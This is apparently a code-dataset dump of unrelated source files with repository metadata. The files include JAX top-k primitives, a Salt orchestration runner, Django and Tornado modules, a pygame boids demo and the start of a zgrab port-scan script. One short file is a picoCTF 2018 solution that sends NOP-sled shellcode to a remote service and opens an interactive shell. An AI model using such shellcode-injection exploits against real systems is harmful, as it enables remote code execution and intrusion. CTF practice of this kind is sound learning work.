aggregate_to_topk: bool = True) -> Tuple[Array, Array]:
"""Returns max ``k`` values and their indices of the ``operand`` in an approximate manner.
Args:
operand : Array to search for max-k. Must be a floating number type.
k : Specifies the number of max-k.
reduction_dimension : Integer dimension along which to search. Default: -1.
recall_target : Recall target for the approximation.
reduction_input_size_override : When set to a positive value, it overrides
the size determined by ``operand[reduction_dim]`` for evaluating the
recall. This option is useful when the given ``operand`` is only a subset
of the overall computation in SPMD or distributed pipelines, where the
true input size cannot be deferred by the operand shape.
aggregate_to_topk : When true, aggregates approximate results to top-k. When
false, returns the approximate results. The number of the approximate
results is implementation defined and is greater equals to the specified
``k``.
Returns:
Tuple of two arrays. The arrays are the max ``k`` values and the
corresponding indices along the ``reduction_dimension`` of the input
``operand``. The arrays' dimensions are the same as the input ``operand``
except for the ``reduction_dimension``: when ``aggregate_to_topk`` is true,
the reduction dimension is ``k``; otherwise, it is greater equals to ``k``
where the size is implementation-defined.
We encourage users to wrap ``approx_max_k`` with jit. See the following
example for maximal inner production search (MIPS):
>>> import functools
>>> import jax
>>> import numpy as np
>>> @functools.partial(jax.jit, static_argnames=["k", "recall_target"])
... def mips(qy, db, k=10, recall_target=0.95):
... dists = jax.lax.dot(qy, db.transpose())
... # returns (f32[qy_size, k], i32[qy_size, k])
... return jax.lax.approx_max_k(dists, k=k, recall_target=recall_target)
>>>
>>> qy = jax.numpy.array(np.random.rand(50, 64))
>>> db = jax.numpy.array(np.random.rand(1024, 64))
>>> dot_products, neighbors = mips(qy, db, k=10)
"""
if xc._version < 45:
aggregate_to_topk = True
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=True,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk)
def approx_min_k(operand: Array,
k: int,
reduction_dimension: int = -1,
recall_target: float = 0.95,
reduction_input_size_override: int = -1,
aggregate_to_topk: bool = True) -> Tuple[Array, Array]:
"""Returns min ``k`` values and their indices of the ``operand`` in an approximate manner.
Args:
operand : Array to search for min-k. Must be a floating number type.
k : Specifies the number of min-k.
reduction_dimension: Integer dimension along which to search. Default: -1.
recall_target: Recall target for the approximation.
reduction_input_size_override : When set to a positive value, it overrides
the size determined by ``operand[reduction_dim]`` for evaluating the
recall. This option is useful when the given operand is only a subset of
the overall computation in SPMD or distributed pipelines, where the true
input size cannot be deferred by the ``operand`` shape.
aggregate_to_topk: When true, aggregates approximate results to top-k. When
false, returns the approximate results. The number of the approximate
results is implementation defined and is greater equals to the specified
``k``.
Returns:
Tuple of two arrays. The arrays are the least ``k`` values and the
corresponding indices along the ``reduction_dimension`` of the input
``operand``. The arrays' dimensions are the same as the input ``operand``
except for the ``reduction_dimension``: when ``aggregate_to_topk`` is true,
the reduction dimension is ``k``; otherwise, it is greater equals to ``k``
where the size is implementation-defined.
We encourage users to wrap ``approx_min_k`` with jit. See the following example
for nearest neighbor search over the squared l2 distance:
>>> import functools
>>> import jax
>>> import numpy as np
>>> @functools.partial(jax.jit, static_argnames=["k", "recall_target"])
... def l2_ann(qy, db, half_db_norms, k=10, recall_target=0.95):
... dists = half_db_norms - jax.lax.dot(qy, db.transpose())
... return jax.lax.approx_min_k(dists, k=k, recall_target=recall_target)
>>>
>>> qy = jax.numpy.array(np.random.rand(50, 64))
>>> db = jax.numpy.array(np.random.rand(1024, 64))
>>> half_db_norms = jax.numpy.linalg.norm(db, axis=1) / 2
>>> dists, neighbors = l2_ann(qy, db, half_db_norms, k=10)
In the example above, we compute ``db_norms/2 - dot(qy, db^T)`` instead of
``qy^2 - 2 dot(qy, db^T) + db^2`` for performance reason. The former uses less
arithmetics and produces the same set of neighbors.
"""
if xc._version < 45:
aggregate_to_topk = True
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=False,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk)
def _approx_top_k_abstract_eval(operand, *, k, reduction_dimension,
recall_target, is_max_k,
reduction_input_size_override,
aggregate_to_topk):
if k <= 0:
raise ValueError('k must be positive, got {}'.format(k))
if len(operand.shape) == 0:
raise TypeError('approx_top_k operand must have >= 1 dimension, got {}'.format(
operand.shape))
dims = list(operand.shape)
if dims[reduction_dimension] < k:
raise ValueError(
'k must be smaller than the size of reduction_dim {}, got {}'.format(
dims[reduction_dimension], k))
if not dtypes.issubdtype(operand.dtype, np.floating):
raise ValueError('operand must be a floating type')
if xc._version >= 45:
reduction_input_size = dims[reduction_dimension]
dims[reduction_dimension] = xc.ops.ApproxTopKReductionOutputSize(
reduction_input_size, len(dims), k, recall_target, aggregate_to_topk,
reduction_input_size_override)[0]
else:
dims[reduction_dimension] = k
return (operand.update(
shape=dims, dtype=operand.dtype, weak_type=operand.weak_type),
operand.update(shape=dims, dtype=np.dtype(np.int32)))
def _comparator_builder(op_type, is_max_k):
c = xc.XlaBuilder(
'top_k_{}_comparator'.format('gt' if is_max_k else 'lt'))
p0 = xla.parameter(c, 0, xc.Shape.scalar_shape(op_type))
p1 = xla.parameter(c, 1, xc.Shape.scalar_shape(op_type))
xla.parameter(c, 2, xc.Shape.scalar_shape(np.dtype(np.int32)))
xla.parameter(c, 3, xc.Shape.scalar_shape(np.dtype(np.int32)))
if is_max_k:
cmp_result = xc.ops.Gt(p0, p1)
else:
cmp_result = xc.ops.Lt(p0, p1)
return c.build(cmp_result)
def _get_init_val_literal(op_type, is_max_k):
return np.array(np.NINF if is_max_k else np.Inf, dtype=op_type)
def _approx_top_k_tpu_translation(ctx, avals_in, avals_out, operand, *, k,
reduction_dimension, recall_target, is_max_k,
reduction_input_size_override,
aggregate_to_topk):
c = ctx.builder
op_shape = c.get_shape(operand)
if not op_shape.is_array():
raise ValueError('operand must be an array, but was {}'.format(op_shape))
op_dims = op_shape.dimensions()
op_type = op_shape.element_type()
if reduction_dimension < 0:
reduction_dimension = len(op_dims) + reduction_dimension
comparator = _comparator_builder(op_type, is_max_k)
init_val_literal = _get_init_val_literal(op_type, is_max_k)
iota = xc.ops.Iota(c, xc.Shape.array_shape(np.dtype(np.int32), op_dims),
reduction_dimension)
init_val = xc.ops.Constant(c, init_val_literal)
init_arg = xc.ops.Constant(c, np.int32(-1))
out = xc.ops.ApproxTopK(c, [operand, iota], [init_val, init_arg], k,
reduction_dimension, comparator, recall_target,
aggregate_to_topk, reduction_input_size_override)
return xla.xla_destructure(c, out)
def _approx_top_k_fallback_translation(ctx, avals_in, avals_out, operand, *, k,
reduction_dimension, recall_target,
is_max_k, reduction_input_size_override,
aggregate_to_topk):
c = ctx.builder
op_shape = c.get_shape(operand)
if not op_shape.is_array():
raise ValueError('operand must be an array, but was {}'.format(op_shape))
op_dims = op_shape.dimensions()
op_type = op_shape.element_type()
if reduction_dimension < 0:
reduction_dimension = len(op_dims) + reduction_dimension
comparator = _comparator_builder(op_type, is_max_k)
iota = xc.ops.Iota(c, xc.Shape.array_shape(np.dtype(np.int32), op_dims),
reduction_dimension)
if xc._version >= 60:
init_val_literal = _get_init_val_literal(op_type, is_max_k)
init_val = xc.ops.Constant(c, init_val_literal)
init_arg = xc.ops.Constant(c, np.int32(-1))
out = xc.ops.ApproxTopKFallback(c, [operand, iota], [init_val, init_arg], k,
reduction_dimension, comparator,
recall_target, aggregate_to_topk,
reduction_input_size_override)
return xla.xla_destructure(c, out)
else:
val_arg = xc.ops.Sort(c, [operand, iota], comparator, reduction_dimension)
vals = xc.ops.GetTupleElement(val_arg, 0)
args = xc.ops.GetTupleElement(val_arg, 1)
sliced_vals = xc.ops.SliceInDim(vals, 0,
avals_out[0].shape[reduction_dimension], 1,
reduction_dimension)
sliced_args = xc.ops.SliceInDim(args, 0,
avals_out[0].shape[reduction_dimension], 1,
reduction_dimension)
return sliced_vals, sliced_args
def _approx_top_k_batch_rule(batch_operands, batch_axes, *, k,
reduction_dimension, recall_target, is_max_k,
reduction_input_size_override, aggregate_to_topk):
assert len(batch_operands) == 1
assert len(batch_axes) == 1
operand, = batch_operands
batch_axis, = batch_axes
dim_map = [d for d in range(operand.ndim) if d is not batch_axis]
reduction_dimension = dim_map[reduction_dimension]
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=is_max_k,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk), (batch_axis, batch_axis)
# Slow jvp implementation using gather.
#
# TODO(fchern): Some optimization ideas
# 1. ApproxTopK is internally a variadic reduce, so we can simply call
# ApproxTopK(operand, tangent, iota) for jvp.
# 2. vjp cannot benefit from the algorithm above. We must run scatter to
# distribute the output cotangent to input cotangent. A reasonable way to do
# this is to run it on CPU.
def _approx_top_k_jvp(primals, tangents, *, k, reduction_dimension,
recall_target, is_max_k, reduction_input_size_override,
aggregate_to_topk):
operand, = primals
tangent, = tangents
if is_max_k:
val_out, arg_out = approx_max_k(operand, k, reduction_dimension,
recall_target,
reduction_input_size_override,
aggregate_to_topk)
else:
val_out, arg_out = approx_min_k(operand, k, reduction_dimension,
recall_target,
reduction_input_size_override,
aggregate_to_topk)
if type(tangent) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
arg_shape = arg_out.shape
rank = len(arg_shape)
if reduction_dimension < 0:
reduction_dimension += rank
iotas = [
lax.broadcasted_iota(arg_out.dtype, arg_shape, i) for i in range(rank)
]
idx = tuple(
arg_out if i == reduction_dimension else iotas[i] for i in range(rank))
tangent_out = tangent[idx]
return (val_out, arg_out), (tangent_out, ad_util.Zero.from_value(arg_out))
approx_top_k_p = core.Primitive('approx_top_k')
approx_top_k_p.multiple_results = True
approx_top_k_p.def_impl(partial(xla.apply_primitive, approx_top_k_p))
approx_top_k_p.def_abstract_eval(_approx_top_k_abstract_eval)
xla.register_translation(approx_top_k_p, _approx_top_k_fallback_translation)
xla.register_translation(approx_top_k_p, _approx_top_k_tpu_translation,
platform='tpu')
batching.primitive_batchers[approx_top_k_p] = _approx_top_k_batch_rule
ad.primitive_jvps[approx_top_k_p] = _approx_top_k_jvp
| [
"[email protected]"
] | |
b8d68d8d894d6c17419300003a7d20d74344d72a | c9a809c5ef2a6b5e7e50da548c182510d203f430 | /salt/runners/state.py | c518e3a0d78bbbd446286c27c563e844fd7152c4 | [
"Apache-2.0"
] | permissive | andyyumiao/saltx | 676a44c075ce06d5ac62fc13de6dcd750b3d0d74 | a05c22a60706b5c4389adbd77581b5cf985763b5 | refs/heads/master | 2022-02-24T00:51:42.420453 | 2022-02-09T06:46:40 | 2022-02-09T06:46:40 | 231,860,568 | 1 | 5 | NOASSERTION | 2022-02-09T06:46:40 | 2020-01-05T03:10:15 | Python | UTF-8 | Python | false | false | 7,000 | py | # -*- coding: utf-8 -*-
'''
Execute orchestration functions
'''
# Import pytohn libs
from __future__ import absolute_import, print_function
import logging
# Import salt libs
import salt.loader
import salt.utils
import salt.utils.event
from salt.exceptions import SaltInvocationError
LOGGER = logging.getLogger(__name__)
def orchestrate(mods,
saltenv='base',
test=None,
exclude=None,
pillar=None,
pillarenv=None,
pillar_enc=None,
orchestration_jid=None):
'''
.. versionadded:: 0.17.0
Execute a state run from the master, used as a powerful orchestration
system.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:mod:`Docs for the master-side state module <salt.states.saltmod>`
CLI Examples:
.. code-block:: bash
salt-run state.orchestrate webserver
salt-run state.orchestrate webserver saltenv=dev test=True
salt-run state.orchestrate webserver saltenv=dev pillarenv=aws
.. versionchanged:: 2014.1.1
Runner renamed from ``state.sls`` to ``state.orchestrate``
.. versionchanged:: 2014.7.0
Runner uses the pillar variable
.. versionchanged:: develop
Runner uses the pillar_enc variable that allows renderers to render the pillar.
This is usable when supplying the contents of a file as pillar, and the file contains
gpg-encrypted entries.
.. seealso:: GPG renderer documentation
CLI Examples:
.. code-block:: bash
salt-run state.orchestrate webserver pillar_enc=gpg pillar="$(cat somefile.json)"
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
if pillarenv is None and 'pillarenv' in __opts__:
pillarenv = __opts__['pillarenv']
if saltenv is None and 'saltenv' in __opts__:
saltenv = __opts__['saltenv']
running = minion.functions['state.sls'](
mods,
test,
exclude,
pillar=pillar,
saltenv=saltenv,
pillarenv=pillarenv,
pillar_enc=pillar_enc,
__pub_jid=orchestration_jid,
orchestration_jid=orchestration_jid)
ret = {'data': {minion.opts['id']: running}, 'outputter': 'highstate'}
res = salt.utils.check_state_result(ret['data'])
if res:
ret['retcode'] = 0
else:
ret['retcode'] = 1
return ret
# Aliases for orchestrate runner
orch = salt.utils.alias_function(orchestrate, 'orch')
sls = salt.utils.alias_function(orchestrate, 'sls')
def orchestrate_single(fun, name, test=None, queue=False, pillar=None, **kwargs):
'''
Execute a single state orchestration routine
.. versionadded:: 2015.5.0
CLI Example:
.. code-block:: bash
salt-run state.orchestrate_single fun=salt.wheel name=key.list_all
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
running = minion.functions['state.single'](
fun,
name,
test=None,
queue=False,
pillar=pillar,
**kwargs)
ret = {minion.opts['id']: running}
__jid_event__.fire_event({'data': ret, 'outputter': 'highstate'}, 'progress')
return ret
def orchestrate_high(data, test=None, queue=False, pillar=None, **kwargs):
'''
Execute a single state orchestration routine
.. versionadded:: 2015.5.0
CLI Example:
.. code-block:: bash
salt-run state.orchestrate_high '{
stage_one:
{salt.state: [{tgt: "db*"}, {sls: postgres_setup}]},
stage_two:
{salt.state: [{tgt: "web*"}, {sls: apache_setup}, {
require: [{salt: stage_one}],
}]},
}'
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
running = minion.functions['state.high'](
data,
test=None,
queue=False,
pillar=pillar,
**kwargs)
ret = {minion.opts['id']: running}
__jid_event__.fire_event({'data': ret, 'outputter': 'highstate'}, 'progress')
return ret
def event(tagmatch='*',
count=-1,
quiet=False,
sock_dir=None,
pretty=False,
node='master'):
r'''
Watch Salt's event bus and block until the given tag is matched
.. versionadded:: 2014.7.0
This is useful for utilizing Salt's event bus from shell scripts or for
taking simple actions directly from the CLI.
Enable debug logging to see ignored events.
:param tagmatch: the event is written to stdout for each tag that matches
this pattern; uses the same matching semantics as Salt's Reactor.
:param count: this number is decremented for each event that matches the
``tagmatch`` parameter; pass ``-1`` to listen forever.
:param quiet: do not print to stdout; just block
:param sock_dir: path to the Salt master's event socket file.
:param pretty: Output the JSON all on a single line if ``False`` (useful
for shell tools); pretty-print the JSON output if ``True``.
:param node: Watch the minion-side or master-side event bus.
.. versionadded:: 2016.3.0
CLI Examples:
.. code-block:: bash
# Reboot a minion and run highstate when it comes back online
salt 'jerry' system.reboot && \\
salt-run state.event 'salt/minion/jerry/start' count=1 quiet=True && \\
salt 'jerry' state.highstate
# Reboot multiple minions and run highstate when all are back online
salt -L 'kevin,stewart,dave' system.reboot && \\
salt-run state.event 'salt/minion/*/start' count=3 quiet=True && \\
salt -L 'kevin,stewart,dave' state.highstate
# Watch the event bus forever in a shell while-loop.
salt-run state.event | while read -r tag data; do
echo $tag
echo $data | jq --color-output .
done
.. seealso::
See :blob:`tests/eventlisten.sh` for an example of usage within a shell
script.
'''
statemod = salt.loader.raw_mod(__opts__, 'state', None)
return statemod['state.event'](
tagmatch=tagmatch,
count=count,
quiet=quiet,
sock_dir=sock_dir,
pretty=pretty,
node=node)
| [
"[email protected]"
] | |
8f1eca7502fed553159d86ab0a9a9fc3b4e6cc4e | 830465731dfda87b4141546262f20d74c29297bf | /PWN/picoCTF2018/gps/sol.py | 30b5d3d95371c78ea26ca454d6de1719db8ff1e5 | [] | no_license | jchen8tw-research/CTF | f559d7ca0e16a730335b11caeeae208c42e8bf17 | f49615c24437a9cc6a2c20d6b30cb5abf7a32b71 | refs/heads/master | 2023-03-17T12:29:08.630613 | 2021-03-23T06:31:26 | 2021-03-23T06:31:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | #coding=utf-8
from pwn import *
import re
#context.log_level = 'debug'
#context(arch='amd64', os='linux', bits = '64')
context.binary = './gps'
debug = 0
if not debug:
r = remote('2018shell.picoctf.com', 49351)
else:
r = process('./gps')
nop = asm(shellcraft.nop())
shell = asm(shellcraft.sh())
#shell = asm(pwnlib.shellcraft.amd64.linux.sh())
payload = nop * (0x1000 - len(shell) - 3) + shell
addr = int(r.recvuntil('> ').split('\n')[9].split(': ')[1][2:], 16)
addr += 2000
log.info('addr: {}'.format(addr))
r.sendline(payload)
r.sendlineafter('> ', hex(addr)[2:])
r.interactive()
| [
"[email protected]"
] | |
7d06158920b29367d17b448de2179236f193de27 | b19c9fe62eaa309851dc11f6fd7a05bda463fb58 | /bigfish/apps/reports/urls.py | 5e6efab43043385bd460b9f0af28d1b83c72092f | [] | no_license | hyu9999/bigfish | 3ff3b025982e71bd6dd80f60ad6c70e735e98936 | 4189fdcacc20795a4778b53c9d47d6fdd3e71811 | refs/heads/master | 2022-07-08T13:55:12.908583 | 2019-03-22T09:36:12 | 2019-03-22T09:36:12 | 177,055,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | from django.conf.urls import url
from rest_framework import routers
router = routers.SimpleRouter()
# router.register(r'studies/enters', EnterStudyViewSet)
# router.register(r'studies/conversations', ConversationViewSet)
# router.register(r'studies/savedatainfo', SaveDataInfoViews)
# router.register(r'studies/savedatadetails', SaveDataDetailsViews)
# router.register(r'studies/examinationreport', ExaminationReportViewSet)
# router.register(r'studies/ratingreport', RatingReportViewSet)
# router.register(r'studies/practical_course_record', PracticalCourseRecordViewSet)
# router.register(r'studies/request_exception', RequestExceptionViewSet)
urlpatterns = router.urls
| [
"[email protected]"
] | |
ab77d94e70a98628a260f53902bdd8a90be36265 | ab1d0fcd4900e0a88d49999cbbde4b06cc441e5d | /Labs/Lab 3/Lab3/Boids.py | fd61d89efc38e7991605f09d6257f5c325460d9d | [] | no_license | ThomasMGilman/ETGG1803_ConceptsOf3DGraphicsAndMath | bf261b7ce16bb686e42b1a2600aa97b4f8984b65 | fdf4e216b117769246154cd360b2c321f4581354 | refs/heads/master | 2020-03-29T23:14:05.715926 | 2018-09-26T17:18:25 | 2018-09-26T17:18:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import flock
import pygame
import math3d
import random
# Pygame startup
pygame.init()
win_width = 800
win_height = 600
screen = pygame.display.set_mode((win_width, win_height))
fontObj = pygame.font.SysFont("Courier New", 12)
clock = pygame.time.Clock()
done = False
paused = False
# This is a list of circular "obstacles" (pos_vector, rad)
obstacles = []
for i in range(3):
x = random.randint(0, win_width)
y = random.randint(0, win_height)
obstacles.append([math3d.VectorN(x, y), random.randint(50, 150)])
# Create the flock. Flock-members shouldn't spawn on obstacles (if doing the bonus)
F = flock.Flock((0,0,win_width,win_height), 20, obstacles)
# The mouse position (or None if the user isn't clicking)
mpos = None
# Game Loop
while not done:
# Update
deltaTime = clock.tick() / 1000.0
if paused:
deltaTime = 0.0 # Everything remains functional, but we don't move anything...
F.update(deltaTime, mpos)
# Input
event = pygame.event.poll()
if event.type == pygame.KEYDOWN and event.key == pygame.K_p:
paused = not paused
keys = pygame.key.get_pressed()
mx, my = pygame.mouse.get_pos()
if keys[pygame.K_ESCAPE]:
done = True
if pygame.mouse.get_pressed()[0]:
mouseClicked = True
mpos = math3d.VectorN(mx, my)
else:
mouseClicked = False
mpos = None
# Draw
screen.fill((0,0,0))
for o in obstacles:
pygame.draw.circle(screen, (0,128,0), o[0].int(), o[1])
F.render(screen)
if mouseClicked:
screen.blit(fontObj.render("--Mouse Button Down--", False, (255,255,255)), (0,0))
pygame.display.flip()
# Shutdown
pygame.quit()
| [
"[email protected]"
] | |
52e69b7d9ab9be96457650a33223304431a7087b | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/madeira/handlers/data/zhixin.py | 575cabc375e33c3480809e11ab34c9e4197cd44f | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,763 | py | # 智信接口
import logging
import json
import time
import tornado.gen
from tornado.httpclient import AsyncHTTPClient, HTTPError
from utils.encryption_decryption import to_md5
request_log = logging.getLogger("madeira.request")
RESULT_MAP = {
'2': 0, # 成功
'602': 9, # 服务器数据接收异常
'603': 9, # 请求数据参数格式错误
'606': 9, # 数据签名错误
'621': 9, # 商户余额不足
'622': 9, # 商户不存在
'623': 9, # 商品配置不正确
'624': 9, # 商品未配置
'615': 9, # 号码归属地信息未配置
'625': 9, # 重复订单号
'751': 9, # IP地址未绑定
'626': 9, # 订单号不存在
}
@tornado.gen.coroutine
def up_zhixin(handler, partner):
handler.up_req_time = time.localtime()
time_now = time.localtime()
secret_key = partner["secret_key"]
mrch_no = partner["mrch_no"]
site_num = ""
request_time = time.strftime("%Y%m%d%H%M%S", time_now)
client_order_no = handler.order_id
product_type = 4
phone_no = handler.mobile
cp = ""
city_code = ""
recharge_type = 0
recharge_desc = ""
notify_url = partner["notify_url"]
recharge_amount = None
k = 'private:zhixin:{carrier}:{price}'.format(carrier=handler.carrier, price=handler.price)
recharge_amount = handler.slave.get(k)
if recharge_amount is None:
handler.up_result = 5003
return handler.up_result
sign = to_md5(
"city_code" + city_code + "client_order_no" + client_order_no + "cp" + cp + "mrch_no" + mrch_no + "notify_url" + notify_url + "phone_no" + phone_no + "product_type" + str(
product_type) + "recharge_amount" + str(
recharge_amount) + "recharge_desc" + recharge_desc + "recharge_type" + str(
recharge_type) + "request_time" + request_time + "site_num" + site_num + secret_key)
body = {
"mrch_no": mrch_no,
"site_num": site_num,
"request_time": request_time,
"client_order_no": client_order_no,
"product_type": product_type,
"phone_no": phone_no,
"cp": cp,
"city_code": city_code,
"recharge_amount": recharge_amount,
"recharge_type": recharge_type,
"recharge_desc": recharge_desc,
"notify_url": notify_url,
"sign": sign,
}
body = json.dumps(body)
url = partner["url_busi"]
h = {'Content-Type': 'application/json; charset=utf-8'}
result = 9999
up_result = None
http_client = AsyncHTTPClient()
try:
request_log.info("REQU %s", body, extra={'orderid': handler.order_id})
response = yield http_client.fetch(url, method='POST', body=body, headers=h, request_timeout=120)
except HTTPError as http_error:
request_log.error('CALL UPSTREAM FAIL %s', http_error, extra={'orderid': handler.order_id})
result = 60000 + http_error.code
response = None
except Exception as e:
request_log.error('CALL UPSTREAM FAIL %s', e, extra={'orderid': handler.order_id})
response = None
finally:
http_client.close()
handler.up_resp_time = time.localtime()
if response and response.code == 200:
response_body = response.body.decode('utf8')
request_log.info("RESP %s", response_body, extra={'orderid': handler.order_id})
try:
response_body = json.loads(response_body)
up_result = response_body["code"]
result = RESULT_MAP.get(up_result, 9)
handler.up_result = up_result
except Exception as e:
result = 9999
handler.up_result = result
request_log.error('PARSE UPSTREAM %s', e, extra={'orderid': handler.order_id})
return result | [
"[email protected]"
] | |
b39e713e9b9d37a4a0137e5f0283d1dbfadfd28d | 3986a89bb2c7fbc679dae33b0e1c280caa032885 | /marketing/models.py | 7f955fcc2f80924dcb266fe5005f66793ebf8076 | [] | no_license | sajalmia381/ecommerce | 9d46d9e00b5c58b294bc6d96019d389a24f57952 | 9e09da97c714b42bb415ff3cce87ff91cd69f925 | refs/heads/master | 2022-12-11T15:00:37.643467 | 2019-08-12T14:20:45 | 2019-08-12T14:20:45 | 123,375,046 | 0 | 0 | null | 2022-12-08T02:10:36 | 2018-03-01T03:09:26 | CSS | UTF-8 | Python | false | false | 1,097 | py | from django.db import models
from django.conf import settings
from django.db.models.signals import post_save
from .utils import MailChimp
# Create your models here.
class MarketingPreference(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
subscribe = models.BooleanField(default=True)
mailchimp_mes = models.TextField(null=True, blank=True)
timestremp = models.DateTimeField(auto_now_add=True)
update_on = models.DateTimeField(auto_now=True)
def __str__(self):
return self.user.email
def marking_pre_update_reciver(sender, instance, created, *args, **kwargs):
if created:
status_code, response_data = MailChimp().subscribe(instance.user.email)
print(status_code, response_data)
post_save.connect(marking_pre_update_reciver, sender=MarketingPreference)
def make_marketing_pre_reciver(sender, instance, created, *args, **kwargs):
if created:
MarketingPreference.objects.get_or_create(user=instance)
post_save.connect(make_marketing_pre_reciver, sender=settings.AUTH_USER_MODEL) | [
"[email protected]"
] | |
4acec8ace69eef5aab6e597888b33efb4cfdabc3 | f9c7f734e13fa3c61347fe475306a6759940b860 | /python3_cron_scripts/zgrab_port_ip.py | 7c1c7b6e9d77c38598728e28b330e0706eb6664f | [
"Apache-2.0"
] | permissive | DalavanCloud/Marinus | 48936f54395bae7c3e39dcffed77bb6fae3b473c | a9f3c4a54f6bf5c044121ac6d8d3d18a7a0e09d0 | refs/heads/master | 2020-04-29T12:32:17.645410 | 2019-03-16T00:37:11 | 2019-03-16T00:37:11 | 176,140,449 | 1 | 0 | null | 2019-03-17T18:07:18 | 2019-03-17T18:07:18 | null | UTF-8 | Python | false | false | 30,397 | py | #!/usr/bin/python3
# Copyright 2019 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This script will use ZGrab or ZGrab 2.0 for port scans of the specified ports.
It is different than the zgrab_http scripts in that it is a more basic look at the connection.
For instance, it does not follow HTTP redirects and it does not support domains as input.
With regards to sleep and batch size, the sleep is how long it will wait between batches.
Therefore, if the batch size is 50 and the sleep time is 10, then it will sleep for 10 seconds, process 50 hosts
from the queue, sleep 10 seconds, test another 50 hosts, etc. The sleep time does not refer to how long it sleeps
between individual host connections.
The original ZGrab has been deprecated and replaced with ZGrab 2.0. This script will support using either version.
However, the version that you use in the Python scripts should match the version that you have specified in the
web server configuration. The schemas between ZGrab and ZGrab 2.0 are not compatible.
You can specify the location of ZGrab using the command line. The script assumes that paths with "zgrab2"
in them indicates that you're running ZGrab 2.0. Otherwise, it will assume that you are running the original
ZGrab.
Please note that this script assumes that a "./json_p{#}" directory exists for the port that you are scanning.
If it does not exist, then this script will create it.
https://github.com/zmap/zgrab
https://github.com/zmap/zgrab2
"""
import argparse
import json
import os
import queue
import random
import subprocess
import threading
import time
from datetime import datetime, timedelta
from bson.objectid import ObjectId
from dateutil.parser import parse
from netaddr import IPAddress, IPNetwork
from libs3 import RemoteMongoConnector, JobsManager
from libs3.ZoneManager import ZoneManager
# Globals that need to maintain consistency between threads.
global_exit_flag = 0
global_queue_lock = threading.Lock()
global_work_queue = queue.Queue()
global_queue_size = 50
global_sleep_time = 0
global_zgrab_path = "./zgrab/src/github.com/zmap/zgrab2/zgrab2"
global_port_names = {"22": "ssh",
"25": "smtp",
"80": "http",
"443": "tls",
"465": "smtp"}
def is_running(process):
"""
Is the provided process name is currently running?
"""
proc_list = subprocess.Popen(["pgrep", "-f", process], stdout=subprocess.PIPE)
for proc in proc_list.stdout:
if proc.decode('utf-8').rstrip() != str(os.getpid()) and proc.decode('utf-8').rstrip() != str(os.getppid()):
return True
return False
def get_aws_ips(rm_connector):
"""
Get the list of AWS CIDRs.
"""
aws_ips = []
aws_ips_collection = rm_connector.get_aws_ips_connection()
results = aws_ips_collection.find({})
for result in results[0]['prefixes']:
aws_ips.append(IPNetwork(result['ip_prefix']))
return aws_ips
def get_azure_ips(rm_connector):
"""
Get the list of AWS CIDRs.
"""
azure_ips = []
azure_ips_collection = rm_connector.get_azure_ips_connection()
results = azure_ips_collection.find({})
for result in results[0]['prefixes']:
azure_ips.append(IPNetwork(result['ip_prefix']))
return azure_ips
def check_in_cidr(ip_addr, cidrs):
"""
Is the provided IP in one of the provided CIDRs?
"""
try:
local_ip = IPAddress(ip_addr)
for network in cidrs:
if local_ip in network:
return True
except:
return False
return False
def is_local_ip(ip):
"""
Returns true if it is a local IP address
"""
if check_in_cidr(ip, [IPNetwork("10.0.0.0/8"), IPNetwork("172.16.0.0/12"),
IPNetwork("192.168.0.0/16"), IPNetwork("127.0.0.0/8")]) or \
ip == "255.255.255.255":
return True
return False
def is_aws_ip(ip_addr, aws_ips):
"""
Is the provided IP within one of the AWS CIDRs?
"""
return check_in_cidr(ip_addr, aws_ips)
def is_azure_ip(ip_addr, azure_ips):
"""
Is the provided IP within one of the AWS CIDRs?
"""
return check_in_cidr(ip_addr, azure_ips)
def is_tracked_ip(ip_addr, tracked_ips):
"""
Is the provided IP within one of the tracked CIDRs?
"""
return check_in_cidr(ip_addr, tracked_ips)
def get_ip_zones(rm_connector):
"""
Get the list of IP Zones
"""
ip_zones_collection = rm_connector.get_ipzone_connection()
ipz_results = ip_zones_collection.find({'status': {"$ne": 'false_positive'}})
ip_zones = []
for ipz in ipz_results:
ip_zones.append(IPNetwork(ipz['zone']))
return ip_zones
def get_mx_ips(zones, all_dns_collection):
"""
Get hosts identified via MX records for SMTP scans.
